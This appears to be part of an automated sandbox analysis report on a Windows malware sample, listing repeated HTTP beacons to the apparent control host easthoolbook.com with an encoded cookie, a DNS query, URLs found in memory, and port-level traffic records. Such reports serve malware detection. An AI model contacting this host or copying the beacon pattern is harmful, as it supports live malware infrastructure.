            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /sign.mpeg?dare=true HTTP/1.1Host: easthoolbook.comAccept: application/xmlCookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36Connection: CloseCache-Control: no-cache
            Source: unknownDNS traffic detected: queries for: easthoolbook.com
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3218783983.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151112670.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3188931002.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245218172.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.00000000004A2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2092109726.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181153623.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3051105235.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/8j
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/Gs
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/Tj
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/bq
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/ign.mpeg?dare=true
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2841533366.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/nr
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/o
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/r
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2396331476.000000000048A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true$j
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.00000000004E7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275111012.00000000004E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true%YE
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3291723868.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true.0h
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true:d
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3129143309.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueGs
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueHj
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueL
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueLj
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueNx
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueProvider
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueProviderLj
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=trueTj
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181259233.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truebd8
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.0000000000459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truedll
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truephic
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truesrP
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truet
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245388886.00000000004E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.00000000004E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=truezY
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/v
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
